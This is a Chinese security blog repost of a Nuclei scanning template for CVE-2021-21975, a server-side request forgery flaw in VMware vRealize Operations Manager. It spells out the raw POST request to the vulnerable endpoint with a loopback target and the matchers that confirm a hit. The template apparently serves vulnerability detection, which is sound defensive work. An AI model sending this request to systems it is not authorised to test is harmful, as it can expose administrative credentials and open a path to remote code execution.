CVE-2021-21975 SSRF

2021年3月31日09:05:02评论124 views字数 825阅读2分45秒阅读模式

id: CVE-2021-21975
info:  name: vRealize Operations Manager API SSRF (VMWare Operations)  author: luci  severity: critical  description: A malicious actor with network access to the vRealize Operations Manager API can perform a Server Side Request Forgery attack to steal administrative credentials or trigger Remote Code Execution using CVE-2021-21983.  tags: cve,cve2021,ssrf,vmware  reference: https://www.vmware.com/security/advisories/VMSA-2021-0004.html
requests:  - raw:      - |        POST /casa/nodes/thumbprints HTTP/1.1        Host: {{Hostname}}        Content-Type: application/json;charset=UTF-8        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)        ["127.0.0.1:443/ui/"]    matchers-condition: and    matchers:      - type: word        words:          - "vRealize Operations Manager"        part: body      - type: status        status:          - 200

https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-21975.yaml

本文始发于微信公众号（Khan安全攻防实验室）：CVE-2021-21975 SSRF

左青龙
微信扫一扫

右白虎
微信扫一扫

CVE-2021-21975 SSRF

保存防火墙规则+NAT讲解

我国人工智能法应如何制定

高级黑客技术-3.网络技巧

pbootcms V3.1.2 "虚假的无文件落地RCE"

动态对抗杀软总结

JWT基础知识及攻击方式详析

实战 | 记一次某系统代码注入绕过

实战:从前端加解密到sql注入过waf

IP audit 记录

实战分享

发表评论

在线咨询

微信